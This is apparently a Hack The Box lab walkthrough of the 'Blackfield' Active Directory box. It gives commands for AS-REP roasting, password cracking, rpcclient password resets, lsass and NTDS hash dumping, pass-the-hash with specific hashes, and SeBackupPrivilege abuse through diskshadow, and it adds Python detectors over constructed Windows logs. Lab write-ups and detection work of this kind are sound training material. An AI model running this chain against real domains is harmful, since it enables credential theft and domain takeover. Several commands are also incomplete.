HTB Walkthrough Blackfield

Box Summary:

Blackfield was released on 6 June 2020 and is rated Hard.

From the nmap scan we can assume we are dealing with an Active Directory machine. After some enumeration we can connect to SMB anonymously; in the profiles$ share we see a lot of usernames, a few of which stand out because they don't start with a capital letter. Further enumeration showed that we could try an AS-REP roasting attack. After getting user credentials we needed some logical thinking: what can we do with this user? It turns out we can change another user's password. That gives access to another share where some sensitive files are located; after downloading them we were able to get the hash of svc_backup, and with it the user flag. For privilege escalation, svc_backup has SeBackupPrivilege enabled, and after some research we can exploit this to get Administrator privileges.


Nmap scan

nmap -sV -sC --top-ports=6000

This shows it’s an Active Directory machine.

SMB Shares Enumeration
Because SMB is enabled I wanted to check for SMB shares.
smbclient -L

Only one share is accessible anonymously: profiles$
smbclient //$

Examining the files in it turned up nothing useful.


Also, anonymous login with RPC failed.


After enumerating the running services I determined that none of them could be used for further enumeration. Because this is an Active Directory machine I looked for common Active Directory exploitation vectors.


We know SMB is enabled, so we can check a list of common usernames: if one of those accounts does not require Kerberos pre-authentication, we can intercept its AS-REP hash and crack it.

Contents of usernames.txt

python blackfield/dc-01 -usersfile usernames.txt -format john -outputfile intercepted_hash

Cracking the intercepted hash

john --wordlist=/usr/share/wordlists/rockyou.txt intercepted_hash

Cracked password: #00^BlackKnight

The credentials are:
support: #00^BlackKnight


I couldn’t access any SMB share with these credentials but I was able to login with rpcclient.
rpcclient -U support

First, I enumerated for more users.

rpcclient has a command called setuserinfo2, which can set a user's password.

The only user for which this succeeded was audit2020:

setuserinfo2 audit2020 23 IceL0rd

Now that we have changed the audit2020 password, we can check whether it gives us access to an SMB share.
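
The two credential steps above (the AS-REP roast of support and the password reset of audit2020) both leave traces in the domain controller's Security log. The following is an added example, not part of the original walkthrough, showing the detection logic a defender would run over those events: 4768 (Kerberos TGT requested) with pre-authentication type 0 and an RC4 ticket is the roastable-account pattern, and 4724 (password reset attempt) by an account outside a helpdesk allow-list is the setuserinfo2 step seen from the DC side. The event lines, the pipe-delimited key=value format, and the allow-list are constructed for the example.

```python
"""Detection of the two credential steps above over constructed Windows Security
event lines (4768 = Kerberos TGT requested, 4724 = password reset attempt).
These are not real logs from the box; the format is a flattened key=value form."""
from collections import defaultdict

# Constructed samples; field names follow the Windows Security log.
SAMPLE_EVENTS = [
    "EventID=4768|TargetUserName=support|ServiceName=krbtgt|TicketEncryptionType=0x17|PreAuthType=0|IpAddress=10.0.0.50",
    "EventID=4768|TargetUserName=bob|ServiceName=krbtgt|TicketEncryptionType=0x17|PreAuthType=0|IpAddress=10.0.0.50",
    "EventID=4768|TargetUserName=support|ServiceName=krbtgt|TicketEncryptionType=0x17|PreAuthType=0|IpAddress=10.0.0.50",
    "EventID=4768|TargetUserName=alice|ServiceName=krbtgt|TicketEncryptionType=0x12|PreAuthType=2|IpAddress=10.0.0.7",
    "EventID=4724|SubjectUserName=support|TargetUserName=audit2020",
    "EventID=4724|SubjectUserName=helpdesk01|TargetUserName=alice",
]

DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit "Do not require Kerberos preauthentication"
RC4_HMAC = "0x17"            # TicketEncryptionType for RC4; john sees it as $krb5asrep$23$
PASSWORD_RESET_ALLOWED = {"helpdesk01"}  # constructed allow-list of accounts expected to reset passwords


def parse_event(line):
    """Turn one pipe-delimited key=value line into a dict."""
    return dict(field.split("=", 1) for field in line.split("|"))


def load_events():
    return [parse_event(line) for line in SAMPLE_EVENTS]


def asrep_roast_sources(events):
    """Group 4768 events issued without pre-authentication (PreAuthType 0) and with an
    RC4 ticket by requesting IP. One IP collecting AS-REPs for several accounts is the
    username-list pattern used above; even one hit is worth looking at."""
    hits = defaultdict(set)
    for ev in events:
        if (ev.get("EventID") == "4768" and ev.get("PreAuthType") == "0"
                and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC):
            hits[ev["IpAddress"]].add(ev["TargetUserName"])
    return {ip: sorted(users) for ip, users in hits.items()}


def unexpected_password_resets(events, allowed=PASSWORD_RESET_ALLOWED):
    """4724 records who reset whose password; a subject outside the allow-list is
    the kind of reset that should never come from an ordinary user account."""
    return [(ev["SubjectUserName"], ev["TargetUserName"]) for ev in events
            if ev.get("EventID") == "4724" and ev["SubjectUserName"] not in allowed]


def preauth_disabled(user_account_control):
    """Audit check on a userAccountControl value: True means the account is
    AS-REP roastable and the flag should be cleared unless there is a reason for it."""
    return bool(user_account_control & DONT_REQ_PREAUTH)


if __name__ == "__main__":
    evs = load_events()
    print("AS-REP requests without pre-auth, by source:", asrep_roast_sources(evs))
    print("Password resets outside the allow-list:", unexpected_password_resets(evs))
    print("0x400200 roastable:", preauth_disabled(0x400200), "/ 0x200 roastable:", preauth_disabled(0x200))
```

The grouping by source address is what separates a single misconfigured account logging on from a list of usernames being tried against the DC; the userAccountControl check is the preventive side, since clearing that bit removes the roasting vector before any ticket is requested.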

Access SMB share with updated password

Connecting to the forensic share.
smbclient -U 'blackfield\audit2020' \\\forensic

After some enumeration of the SMB shares, I found an interesting file which can contain a hash.

Now download it:

smbget smb:// -U audit2020

I used pypykatz to dump the hashes from the lsass minidump:
pypykatz lsa minidump lsass.DMP

After this I read through the dump output.

Pass the hash svc_backup

Because port 5985 is open we can use evil-winrm to login with the hash.

evil-winrm -i blackfield -u svc_backup -H '9658d1d1dcd9250115e2205d9f48400d'

Enumerating the token's privileges shows that SeBackupPrivilege is enabled.

Checking Tokens

Note: This Github page is owned by giuliano108. Secwalk won’t/can’t be responsible for any damage or the content.

whoami /priv

Exploiting the SeBackupPrivilege token

First, we need to download the two DLLs (see resources) and upload them to the system.

upload /tmp/Blackfield/exploitation/SeBackupPrivilegeUtils.dll
upload /tmp/Blackfield/exploitation/SeBackupPrivilegeCmdLets.dll

Now we need to import those two DLLs and enable the token.

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

But we still can't copy and read the root flag.

Changing File Permissions NTDS

What we can do is change the file permissions of ntds.dit (which contains the Administrator hash).

# Assumes $folder (the directory to change) and $user (the account to grant) are already set
$acl = Get-Acl $folder
$rule = New-Object System.Security.AccessControl.FileSystemAccessRule $user, "FullControl", "ContainerInherit,ObjectInherit", "None", "Allow"
$acl.SetAccessRule($rule)   # the new rule must be added to the ACL before it is written back
Set-Acl -Path $folder -AclObject $acl

Creating ShadowCopy

In order to create a shadow copy, we run diskshadow with the following script:

set metadata C:\temp\
set context clientaccessibles
set context persistents
begin backups
add volume c: alias mydrives
expose %mydrive% z:s

Upload it to the target system:
upload /tmp/Blackfield/exploitation/scipt.txt

Diskshadow /s scipt.txt
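
The SeBackupPrivilege chain above (a service account holding the privilege, the helper DLLs being imported, diskshadow run with a script file) is visible in two Security log events: 4672 (special privileges assigned to new logon) lists the privileges granted to a session, and 4688 (process creation) records the command line when command-line logging is turned on. The following is an added example, not part of the original walkthrough, that correlates those two by logon ID so that a non-allow-listed account holding SeBackupPrivilege and then running a scripted diskshadow or loading the SeBackupPrivilege modules is flagged, while a legitimate backup operator doing the same is not. The event lines, the key=value format and the allow-list are constructed for the example.

```python
"""Detection of the SeBackupPrivilege / diskshadow chain above over constructed
Windows Security event lines (4672 = special privileges assigned to new logon,
4688 = process creation). These are not real logs from the box."""

# Constructed samples, pipe-delimited key=value pairs; field names follow the Security log.
SAMPLE_EVENTS = [
    "EventID=4672|SubjectUserName=svc_backup|LogonId=0x3e7a1|PrivilegeList=SeBackupPrivilege,SeRestorePrivilege,SeShutdownPrivilege",
    "EventID=4672|SubjectUserName=Administrator|LogonId=0x1a2b|PrivilegeList=SeSecurityPrivilege,SeBackupPrivilege,SeRestorePrivilege,SeDebugPrivilege",
    "EventID=4688|SubjectUserName=svc_backup|LogonId=0x3e7a1|NewProcessName=C:\\Windows\\System32\\diskshadow.exe|CommandLine=diskshadow /s scipt.txt",
    "EventID=4688|SubjectUserName=svc_backup|LogonId=0x3e7a1|NewProcessName=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell Import-Module .\\SeBackupPrivilegeCmdLets.dll",
    "EventID=4688|SubjectUserName=Administrator|LogonId=0x1a2b|NewProcessName=C:\\Windows\\System32\\diskshadow.exe|CommandLine=diskshadow /s nightly_backup.txt",
]

# Constructed allow-list: accounts expected to hold backup rights and run diskshadow.
BACKUP_ALLOWED = {"Administrator", "svc_veeam"}
# Privileges that let the holder read (backup) or write (restore) any file regardless of its ACL.
FILE_ACL_BYPASS_PRIVS = {"SeBackupPrivilege", "SeRestorePrivilege"}


def parse_event(line):
    """Turn one pipe-delimited key=value line into a dict."""
    return dict(field.split("=", 1) for field in line.split("|"))


def load_events():
    return [parse_event(line) for line in SAMPLE_EVENTS]


def unexpected_backup_privilege(events, allowed=BACKUP_ALLOWED):
    """Map LogonId -> (account, privileges) for every 4672 where an account outside the
    allow-list was granted SeBackupPrivilege or SeRestorePrivilege at logon."""
    flagged = {}
    for ev in events:
        if ev.get("EventID") != "4672" or ev["SubjectUserName"] in allowed:
            continue
        held = FILE_ACL_BYPASS_PRIVS & set(ev["PrivilegeList"].split(","))
        if held:
            flagged[ev["LogonId"]] = (ev["SubjectUserName"], sorted(held))
    return flagged


def shadow_copy_alerts(events, allowed=BACKUP_ALLOWED):
    """Within the sessions flagged above, raise on a scripted diskshadow run (diskshadow /s)
    or on a command line that loads the SeBackupPrivilege helper modules."""
    flagged = unexpected_backup_privilege(events, allowed)
    alerts = []
    for ev in events:
        if ev.get("EventID") != "4688" or ev["LogonId"] not in flagged:
            continue
        exe = ev["NewProcessName"].rsplit("\\", 1)[-1].lower()
        cmd = ev.get("CommandLine", "")
        if exe == "diskshadow.exe" and "/s" in cmd.lower():
            alerts.append((ev["SubjectUserName"], "diskshadow scripted shadow copy", cmd))
        elif "sebackupprivilege" in cmd.lower():
            alerts.append((ev["SubjectUserName"], "SeBackupPrivilege helper module loaded", cmd))
    return alerts


if __name__ == "__main__":
    evs = load_events()
    print("Sessions with unexpected backup rights:", unexpected_backup_privilege(evs))
    for account, reason, cmd in shadow_copy_alerts(evs):
        print(f"ALERT {account}: {reason} ({cmd})")
```

Two caveats for using this on real logs: 4688 only carries the command line when the "Include command line in process creation events" policy is enabled, and 4672 fires for every administrative logon, so the allow-list (or a group membership lookup) is what keeps it from being noise. The preventive fix is the same one this box illustrates: SeBackupPrivilege should be held only by the accounts that actually run backups, and the Backup Operators membership of service accounts deserves the same review as Domain Admins.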

If we look now in our directories we see 2 files that we need to download in order to dump the hash.

Now we have the 2 files we needed on the Kali system.

Now we can dump the hashes from these two files.

python -ntds ntds.dit -system SYSTEM.bak LOCAL -outputfile admin_hash

head -n 5 admin_hash.ntds

Pass the hash Administrator

evil-winrm -i -u administrator -H 184fb5e5178480be64824d4cd53b99ee

Made by: IceL0rd

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.
